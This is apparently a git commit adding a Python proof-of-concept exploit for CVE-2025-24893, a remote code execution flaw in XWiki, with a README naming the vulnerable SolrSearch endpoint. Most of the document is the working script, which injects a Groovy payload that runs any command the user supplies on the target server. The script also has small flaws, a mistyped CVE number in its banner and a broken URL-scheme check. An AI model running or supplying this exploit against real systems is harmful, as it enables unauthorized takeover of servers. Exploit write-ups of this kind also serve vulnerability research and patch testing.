Reformat the repo to store all my PoCs and add CVE-2025-24893

2025-08-18 13:56:34 -06:00
parent 14c0141694
commit 9788148d65
5 changed files with 179 additions and 22 deletions
@@ -0,0 +1,59 @@
+import requests
+import argparse
+import urllib.parse
+
+# Pretty colors :)
+RED = "\033[31m"
+GREEN = "\033[32m"
+YELLOW = "\033[33m"
+BOLD = "\033[1m"
+RESET = "\033[0m"
+
+def testVuln(target):
+    try:
+        resp = requests.get(target)
+    except requests.exceptions.RequestException as error:
+        print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
+        raise SystemExit(error)
+
+    if "xwiki" not in resp.text.lower():
+        print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
+        return False
+    else:
+        return True
+
+def exploit(target, cmd):
+    payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
+    exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' 
+    try:
+        print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
+        resp = requests.get(exploitUrl)
+    except requests.exceptions.RequestException as error:
+        print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
+        raise SystemExit(error)
+    print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
+
+
+if __name__ == "__main__":
+    
+
+    parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
+                                     description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
+                                     epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
+    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+    parser.add_argument('-c', '--command', required=True, help='Command to execute')
+    args = parser.parse_args()
+
+    print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
+    
+    tgt = args.target.lower()
+    if tgt[4] != "http" and tgt[5] != "https":
+        print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
+        tgt = 'http://' + tgt
+
+    if testVuln(tgt):
+        exploit(tgt, args.command)
+    else:
+        raise SystemExit()
+
+
@@ -0,0 +1,11 @@
+# CVE-2025-24893 - XWiki RCE
+
+This vuln stems from improper user input sanitization when passing SolrSearch queries. Arbitrary groovy code can be executed due to a direct evaluate() call.
+
+The vulnerable endpoint here is:
+`/xwiki/bin/get/Main/SolrSearch?media=rss&text=`
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)